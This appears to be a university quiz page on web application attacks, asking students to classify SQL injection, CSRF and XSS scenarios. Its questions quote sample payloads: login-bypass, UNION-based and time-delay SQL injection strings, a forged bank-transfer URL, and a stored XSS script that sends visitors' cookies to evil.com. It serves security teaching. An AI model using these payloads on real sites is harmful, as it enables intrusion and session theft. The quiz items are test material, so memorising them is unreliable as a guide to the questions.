Web Application Attacks

Web Application Attacks

University

10 Qs

quiz-placeholder

Similar activities

Workshop_CYF2024

Workshop_CYF2024

University

11 Qs

1-12 Эвелина 2

1-12 Эвелина 2

University

12 Qs

InfoSec Quiz 1

InfoSec Quiz 1

University

15 Qs

IS Quiz

IS Quiz

University

10 Qs

Quiz9 Web E

Quiz9 Web E

University

14 Qs

pre-test

pre-test

University

10 Qs

[SE] 6. Software Modeling

[SE] 6. Software Modeling

University

10 Qs

Understanding Database Concepts

Understanding Database Concepts

University

10 Qs

Web Application Attacks

Web Application Attacks

Assessment

Quiz

Information Technology (IT)

University

Hard

Created by

Beulah Christudas

Used 1+ times

FREE Resource

10 questions

Show all answers

1.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

A user enters ' OR 1=1-- in a login form, but no error is shown. Instead, the page behaves differently when true or false conditions are injected. There’s no visible database error message, but the attacker observes the application's response changing depending on the input. What type of

SQLi attack is this?

Time-based Blind SQLi

Boolean-based Blind SQLi

Retrieving Hidden Data

Subverting Application logic

2.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

An attacker submits the following input:
' UNION SELECT username, password FROM users--
This causes the application to display usernames and passwords from a different table.

What type of attack is this?

Blind SQLi

Union-based SQLi

Error-based SQLi

Boolean-based SQLi

3.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

An attacker sends the input:
1' OR IF(1=1, SLEEP(5), 0)--
The server takes a long time to respond, suggesting that the attacker can infer whether a condition is true or false based on the response delay.

What type of SQLi attack is this?

Retrieving Hidden Data

Boolean-based Blind SQLi

Subverting Application logic

Time-based Blind SQLi

4.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Alice is logged into her bank account in one browser tab. She clicks a link on a malicious website in another tab. Without her knowledge, a request is sent to https://bank.com/transfer?to=attacker&amount=1000, and the money is transferred.

What type of attack is this?

Cross-site Scripting

Cross-site Request Forgery

SQL Injection

Session Hijacking

5.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

A user comments on a blog post by entering the following code:

<script>document.location='http://evil.com/steal?cookie=' + document.cookie</script>

Every time someone views the comment, their browser executes the script and sends their cookie to the attacker’s server.

What type of attack is this?

Reflected XSS

Stored XSS

DOM-Based XSS

Blind SQLi

6.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

A search form on an e-commerce website allows users to search for products. The intended query is:

SELECT * FROM products WHERE category = 'electronics' AND released = 1;

An attacker modifies the URL to: https://example.com/products?category=electronics'--

What is the effect of this attack?

Subverting application logic

Retrieving hidden data

Time delay

Detailed error

7.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

What type of SQL Injection manipulates application logic to change how a query behaves?

Subverting application logic SQLi

Retrieving Hidden Data SQLi

Blind SQLi

Union based SQLi

Create a free account and access millions of resources

Create resources
Host any resource
Get auto-graded reports
or continue with
Microsoft
Apple
Others
By signing up, you agree to our Terms of Service & Privacy Policy
Already have an account?